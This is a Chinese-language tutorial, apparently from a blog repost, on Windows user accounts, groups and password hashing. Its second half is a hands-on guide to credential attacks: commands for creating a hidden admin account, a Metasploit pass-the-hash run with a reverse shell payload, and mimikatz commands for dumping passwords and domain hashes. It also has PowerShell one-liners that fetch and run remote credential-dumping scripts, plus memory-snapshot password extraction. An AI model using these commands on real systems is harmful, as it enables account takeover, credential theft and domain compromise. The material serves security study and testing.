Windows中的用户和组以及用户密码处理
目錄
用戶帳戶
Windows 默認(rèn)賬戶
Windows?內(nèi)置用戶賬戶
查看、創(chuàng)建和刪除賬戶
組賬戶
內(nèi)置組賬戶
組的查看、創(chuàng)建和刪除
Windows中對(duì)用戶密碼的處理
LM-hash
NTLM-hash
哈希傳遞攻擊(Pass-the-Hash,PtH)
MSF進(jìn)行哈希傳遞攻擊PtH
mimikatz進(jìn)行哈希傳遞攻擊PtH(工作組)
mimikatz進(jìn)行哈希傳遞攻擊PtH(域)
基于SAM文件的密碼破解
使用?mimikatz 破解windows登錄密碼
使用PowerShell命令讀取密碼
從內(nèi)存中讀取密碼
用戶帳戶
用戶帳戶是對(duì)計(jì)算機(jī)用戶身份的標(biāo)識(shí),本地用戶帳戶、密碼存在本地計(jì)算機(jī)上,只對(duì)本機(jī)有效,存儲(chǔ)在本地安全帳戶數(shù)據(jù)庫 SAM 中,文件路徑:C:\Windows\System32\config\SAM ,對(duì)應(yīng)的進(jìn)程:lsass.exe??。通過本地用戶和組,可以為用戶和組分配權(quán)利和權(quán)限,從而限制用戶和組執(zhí)行某些操作的能力。
- 不同的用戶身份擁有不同的權(quán)限
- 每個(gè)用戶包含一個(gè)名稱和一個(gè)密碼
- 用戶帳戶擁有唯一的安全標(biāo)識(shí)符(Security Identifier,SID)
當(dāng)我們?nèi)ミM(jìn)程管理里面殺死?lsass.exe?進(jìn)程時(shí),windows會(huì)提示遇到錯(cuò)誤,然后關(guān)機(jī)。
查看用戶的SID
- whoami? /user? ? ?查看系統(tǒng)當(dāng)前用戶的SID
- wmic? useraccount? get? name,sid? ? ? 查看所有用戶的SID
Windows 默認(rèn)賬戶
用于特殊用途,一般不需更修改其權(quán)限
- 與使用者關(guān)聯(lián)的用戶帳戶 Administrator(管理員用戶)
- 默認(rèn)的管理員用戶 Guest(來賓用戶) 默認(rèn)是禁用的
Windows?內(nèi)置用戶賬戶
與windows組件關(guān)聯(lián)的用戶賬戶
- System (本地系統(tǒng)):為windows的核心組件訪問文件等資源提供權(quán)限
- Local Service (本地服務(wù)):預(yù)設(shè)的擁有最小權(quán)限的本地賬戶
- Network Service (網(wǎng)絡(luò)服務(wù)):具有運(yùn)行網(wǎng)絡(luò)服務(wù)權(quán)限的計(jì)算機(jī)賬戶
查看、創(chuàng)建和刪除賬戶
使用命令查看、創(chuàng)建和刪除賬戶
- net? user ? ?查看系統(tǒng)賬戶
- net? user? ?xie? ? ? 123? ?/add? ? ? ? 創(chuàng)建新用戶xie,密碼設(shè)置為 123
- net? user? ?hack$? 123? /add? ? ? ? 創(chuàng)建隱藏用戶hack,密碼為123
- net? user? xie? ? ? ? 查看賬戶xie的屬性
- net? user? xie? x456.? ? 將用戶寫的密碼修改為x456.
- net? user? xie? /del? ? 刪除用戶xie
- net? localgroup? ?administrators? xie? ? /add? ? ? 將普通用戶xie提權(quán)到管理員
- net? localgroup? ?administrators? hack$? /add? ?將隱藏用戶hack提權(quán)到管理員
組賬戶
- 組是一些用戶的集合
- 組內(nèi)的用戶自動(dòng)具備為組所設(shè)置的權(quán)限
內(nèi)置組賬戶
需要人為添加成員的內(nèi)置組
- Administrators
- Guests
- Power Users
- Users(標(biāo)準(zhǔn)用戶)
- Remote Desktop Users
administators?組內(nèi)的用戶,都具備系統(tǒng)管理員的權(quán)限,它們擁有對(duì)這臺(tái)計(jì)算機(jī)最大的控制權(quán)限,可以執(zhí)行整臺(tái)計(jì)算機(jī)的管理任務(wù)。內(nèi)置的系統(tǒng)管理員賬號(hào) Administrator 就是本地組的成員,而且無法將它從該組刪除。如果這臺(tái)計(jì)算機(jī)已加入域,則域的Domain Admins 會(huì)自動(dòng)地加入到該計(jì)算機(jī)的Administrators組內(nèi)。也就是說,域上的系統(tǒng)管理員在這臺(tái)計(jì)算機(jī)上也具備著系統(tǒng)管理員的權(quán)限
Guests?組是提供給沒有用戶帳戶但是需要訪問本地計(jì)算機(jī)內(nèi)資源的用戶使用,該組的成員無法永久地改變其桌面的工作環(huán)境。該組最常見的默認(rèn)成員為用戶帳號(hào)Guest。
Power Users?組內(nèi)的用戶具備比Users組更多的權(quán)利,但是比Administrators組擁有的權(quán)利更少一些,例如,可以:創(chuàng)建、刪除、更改本地用戶帳戶;創(chuàng)建、刪除、管理本地計(jì)算機(jī)內(nèi)的共享文件夾與共享打印機(jī);自定義系統(tǒng)設(shè)置,例如更改計(jì)算機(jī)時(shí)間、關(guān)閉計(jì)算機(jī)等。但是不可以更改Administrators,無法奪取文件的所有權(quán)、無法備份與還原文件、無法安裝刪除與刪除設(shè)備驅(qū)動(dòng)程序、無法管理安全與審核日志。
Users?組內(nèi)的成員只擁有一些基本的權(quán)利,例如運(yùn)行應(yīng)用程序,但是他們不能修改操作系統(tǒng)的設(shè)置、不能更改其它用戶的數(shù)據(jù)、不能關(guān)閉服務(wù)器級(jí)的計(jì)算機(jī)。所有添加的本地用戶帳戶者自動(dòng)屬于Users組。如果這臺(tái)計(jì)算機(jī)已經(jīng)加入域,則域的Domain Users會(huì)自動(dòng)地被加入到該計(jì)算機(jī)的Users組中。
Remote Desktop Users 組內(nèi)的成員擁有遠(yuǎn)程桌面登錄的權(quán)限。默認(rèn)Administrators組內(nèi)的成員都擁有遠(yuǎn)程桌面的權(quán)限。
動(dòng)態(tài)包含成員的內(nèi)置組
其成員由Windows程序“自動(dòng)添加” ,Windows會(huì)根據(jù)用戶的狀態(tài)來決定用戶所屬的組 ,組內(nèi)的成員也隨之動(dòng)態(tài)變化,無法修改
- Interactive: 動(dòng)態(tài)包含在本地登錄的用戶
- Authenticated Users:任何一個(gè)利用有效的用戶帳戶連接的用戶都屬于這個(gè)組。建議在設(shè)置權(quán)限時(shí),盡量針對(duì)Authenticated Users組進(jìn)行設(shè)置,而不要針對(duì)Everone進(jìn)行設(shè)置。
- Everyone :任何一個(gè)用戶都屬于這個(gè)組。注意,如果Guest帳號(hào)被啟用時(shí),則給Everone這個(gè)組指派權(quán)限時(shí)必須小心,因?yàn)楫?dāng)一個(gè)沒有帳戶的用戶連接計(jì)算機(jī)時(shí),他被允許自動(dòng)利用Guest帳戶連接,但是因?yàn)镚uest也是屬于Everone組,所以他將具備Everyone所擁有的權(quán)限。
組的查看、創(chuàng)建和刪除
使用命令查看、創(chuàng)建和刪除組
- net? localgroup? ? 查看系統(tǒng)的組
- net? localgroup? ?marketGroup? ?/add? ? ? ? ?新建一個(gè)marketGroup的組
- net? localgroup? ?marketGroup? ?xie? /add? ?將用戶xie加入marketGroup組中
- net? localgroup? ?markGroup? ? ?查看markGroup組內(nèi)的成員
- net? localgroup? ?marketGroup? ?xie? /del? ? 將用戶xi從marketGroup組中移除
- net? localgroup? ?marketGroup? ?/del? ? ? ? ? ?刪除marketGroup組
- net? localgroup? "remote desktop users" hack /add? ? ?將用戶hack加入遠(yuǎn)程桌面組
- net? localgroup? "remote desktop users" hack /del? ? ? 將用戶hack從遠(yuǎn)程桌面組刪除
Windows中對(duì)用戶密碼的處理
Windows系統(tǒng)使用兩種方法對(duì)用戶的密碼進(jìn)行哈希處理,它們分別是 LAN Manager(LM)哈希和 NT LAN Manager(NTLM)哈希。所謂哈希(hash),就是使用一種加密函數(shù)對(duì)其進(jìn)行加密。這個(gè)加密函數(shù)對(duì)一個(gè)任意長度的字符串?dāng)?shù)據(jù)進(jìn)行一次數(shù)學(xué)加密函數(shù)運(yùn)算,然后返回一個(gè)固定長度的字符串。現(xiàn)在已經(jīng)有了更新的 NTLMv2 以及 Kerberos 驗(yàn)證體系。Windows加密過的密碼口令,我們稱之為hash,Windows的系統(tǒng)密碼hash默認(rèn)情況下一般由兩部分組成:第一部分是 LM-hash,第二部分是 NTLM-hash。在windows200以后的系統(tǒng)中,第一部分的 LM-hash 都是空值,因?yàn)長M-hash可以很容易的破解,所以windows2000之后這個(gè)值默認(rèn)為空,所以第二部分的NTLM-hash才真正是用戶密碼的哈希值。
通常可從Windows系統(tǒng)中的SAM文件 和 域控的 NTDS.dit 文件中獲得所有用戶的hash,通過Mimikatz讀取lsass.exe進(jìn)程能獲得已登錄用戶的NTLM hash
這個(gè)網(wǎng)站提供對(duì)密碼轉(zhuǎn)換成 LM-Hash 和 NTLM-Hash 的操作:https://asecuritysite.com/encryption/lmhash
LM-hash
LAN Manager(LM)哈希是Windows系統(tǒng)所用的第一種密碼哈希算法。它只有唯一一個(gè)版本且一直用到了NT LAN Manager(NTLM)哈希的出現(xiàn),NTLM哈希用于Windows 2000及其之后系統(tǒng)中。新版操作系統(tǒng)因兼容緣故仍然支持LM哈希算法。但是在 Windows Vista 和 Windows 7 開始,LM-hash是默認(rèn)關(guān)閉的。
LM加密過程
注:自Windows2000以后的 windows 系統(tǒng)都是用 NTLM-hash 處理用戶的密碼
NTLM-hash
New Technology?LAN Manager(NTLM)哈希算法是微軟認(rèn)可的另一種算法。Windows2000以后的 windows 系統(tǒng)都是用 NTLM-hash 處理用戶的密碼
NTLM加密過程
在線NTLM加密的網(wǎng)站:NTLM密碼加密計(jì)算器
如圖,第三部分是LM-Hash,第四部分是NTLM-Hash。目前的LM-hash是空值,所以第四部分的NTLM-hash才是用戶密碼的哈希值。?
哈希傳遞攻擊(Pass-the-Hash,PtH)
MSF進(jìn)行哈希傳遞攻擊PtH
有些時(shí)候,當(dāng)我們獲取到了某臺(tái)主機(jī)的Administrator用戶的LM-Hash和 NTLM-Hash ,并且該主機(jī)的445端口打開著。我們則可以利用?exploit/windows/smb/psexec 漏洞用MSF進(jìn)行遠(yuǎn)程登錄(哈希傳遞攻擊)。(只能是administrator用戶的LM-hash和NTLM-hash),這個(gè)利用跟工作組環(huán)境或者域環(huán)境無關(guān)。
msf > use exploit/windows/smb/psexec msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp msf exploit(psexec) > set lhost 192.168.10.27 msf exploit(psexec) > set rhost 192.168.10.14 msf exploit(psexec) > set smbuser Administrator msf exploit(psexec) > set smbpass 815A3D91F923441FAAD3B435B51404EE:A86D277D2BCD8C8184B01AC21B6985F6 #這里L(fēng)M和NTLM我們已經(jīng)獲取到了 msf exploit(psexec) > exploitmimikatz進(jìn)行哈希傳遞攻擊PtH(工作組)
當(dāng)我們獲得了一臺(tái)主機(jī)的NTLM哈希值,我們可以使用mimikatz對(duì)其進(jìn)行哈希傳遞攻擊。執(zhí)行完命令后,會(huì)彈出cmd窗口。
#使用administrator用戶的NTLM哈希值進(jìn)行攻擊 sekurlsa::pth /user:administrator /domain:192.168.10.15 /ntlm:329153f560eb329c0e1deea55e88a1e9#使用xie用戶的NTLM哈希值進(jìn)行攻擊 sekurlsa::pth /user:xie /domain:192.168.10.15 /ntlm:329153f560eb329c0e1deea55e88a1e9在彈出的cmd窗口,我們直接可以連接該主機(jī),并且查看該主機(jī)下的文件夾。
或者可以直接將該主機(jī)的C盤映射到本地的K盤。
非 administrator 用戶權(quán)限不夠!
注:只能在 mimikatz 彈出的cmd窗口才可以執(zhí)行這些操作!
mimikatz進(jìn)行哈希傳遞攻擊PtH(域)
在域環(huán)境中,當(dāng)我們獲得了域內(nèi)用戶的NTLM哈希值,我們可以使用域內(nèi)的一臺(tái)主機(jī)用mimikatz對(duì)域控進(jìn)行哈希傳遞攻擊。執(zhí)行完命令后,會(huì)彈出cmd窗口。前提是我們必須擁有域內(nèi)任意一臺(tái)主機(jī)的本地?administrator?權(quán)限和獲得了域用戶的NTLM哈希值
- 域:xie.com
- 域控:WIN2008.xie.com
基于SAM文件的密碼破解
SAM文件即賬號(hào)密碼數(shù)據(jù)庫文件。 當(dāng)我們登錄系統(tǒng)的時(shí)候,系統(tǒng)會(huì)自動(dòng)地和?C:\Windows\System32\config\SAM?中的SAM文件自動(dòng)校對(duì),如發(fā)現(xiàn)此次密碼與SAM文件中的加密數(shù)據(jù)符合時(shí),你就會(huì)順利登錄;如果錯(cuò)誤則無法登錄。在系統(tǒng)運(yùn)行期間,SAM文件一直是被占用的,是無法打開和編輯復(fù)制的,我們可以進(jìn)入PE系統(tǒng)進(jìn)行復(fù)制然后在利用軟件進(jìn)行密碼的修改
- U盤啟動(dòng),運(yùn)行DiskGenius分區(qū)工具
- 找到 SAM 文件,復(fù)制到U盤
- 在另一臺(tái)電腦上下載軟件 NTPWedit 并運(yùn)行,打開 SAM 文件,解鎖并修改密碼
- 把 SAM 文件復(fù)制到原來的電腦上,覆蓋原文件
注意:這樣只能修改密碼,并不能知道密碼的明文
使用?mimikatz 破解windows登錄密碼
? mimikatz 是一款功能強(qiáng)大的輕量級(jí)調(diào)試神器,通過它你可以提升進(jìn)程權(quán)限注入進(jìn)程讀取進(jìn)程內(nèi)存,當(dāng)然他最大的亮點(diǎn)就是他可以直接從 lsass.exe?進(jìn)程中獲取當(dāng)前登錄系統(tǒng)用戶名的密碼, lsass是微軟Windows系統(tǒng)的安全機(jī)制它主要用于本地安全和登陸策略,通常我們?cè)诘顷懴到y(tǒng)時(shí)輸入密碼之后,密碼便會(huì)儲(chǔ)存在 lsass內(nèi)存中,經(jīng)過其 wdigest 和 tspkg 兩個(gè)模塊調(diào)用后,對(duì)其使用可逆的算法進(jìn)行加密并存儲(chǔ)在內(nèi)存之中, 而 mimikatz 正是通過對(duì)lsass逆算獲取到明文密碼!也就是說只要你不重啟電腦,就可以通過他獲取到登陸密碼,只限當(dāng)前登陸系統(tǒng)!
注:但是在安裝了KB2871997補(bǔ)丁或者系統(tǒng)版本大于windows server 2012時(shí),系統(tǒng)的內(nèi)存中就不再保存明文的密碼,這樣利用mimikatz就不能從內(nèi)存中讀出明文密碼了。
- 下載mimikatz程序,找到自己系統(tǒng)對(duì)應(yīng)的位數(shù),右鍵以管理員身份運(yùn)行
- 提升至debug權(quán)限在提示符下,輸入:privilege::debug
- 抓取密碼: sekurlsa::logonpasswords
使用mimikatz讀取域控上所有域用戶的Hash值
注:得在域控上以域管理員身份執(zhí)行mimikatz
- 提升至debug權(quán)限在提示符下,輸入:privilege::debug
- 抓取密碼: lsadump::lsa /patch
使用PowerShell命令讀取密碼
讀取密碼明文
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCerts讀取密碼hash值
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes從內(nèi)存中讀取密碼
我們都知道虛擬機(jī)有拍攝快照的功能。拍攝快照的瞬間虛擬機(jī)就會(huì)把你當(dāng)前的內(nèi)存保存為一個(gè)文件,文件以 .vmem 結(jié)尾,該文件的大小就是你虛擬機(jī)的內(nèi)存大小。我們現(xiàn)在要從快照內(nèi)存中讀取出密碼。
首先,利用 Bin2Dmp將該內(nèi)存文件轉(zhuǎn)成dmp文件,
Bin2Dmp.exe "Windows 7 x64-381e3888.vmem" windows7.dmp然后我們?cè)?windbg?中載入該文件?
依次在?kd>? 中輸入下面的命令?
.symfix ? #設(shè)置符號(hào)路徑 .reload ? #重新載入 .load D:\Cracer滲透工具包v3.0\Cracer滲透工具包v3.0\Cracer滲透工具\(yùn)windows安全\mimikatz\x64\mimilib.dll #這個(gè)路徑是你mimikatz的路徑 !process 0 0 lsass.exe #查找lsass進(jìn)程,并將該進(jìn)程轉(zhuǎn)到本機(jī)環(huán)境中 .process /r /p fffffa801ae19060 #這里的fffffa801ae19060 是上一步查找lsass進(jìn)程的地址,注意替換 !mimikatz #載入mimikatz,讀取密碼可以看到,已經(jīng)讀取出密碼來了?
鏈接: https://pan.baidu.com/s/1aofXft4YCSGEDEHQcgnCzw? ? ? ?提取碼: p7vx
相關(guān)文章:Windows中的認(rèn)證體系
總結(jié)
以上是生活随笔為你收集整理的Windows中的用户和组以及用户密码处理的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 深度学习之卷积神经网络(Convolut
- 下一篇: java信息管理系统总结_java实现科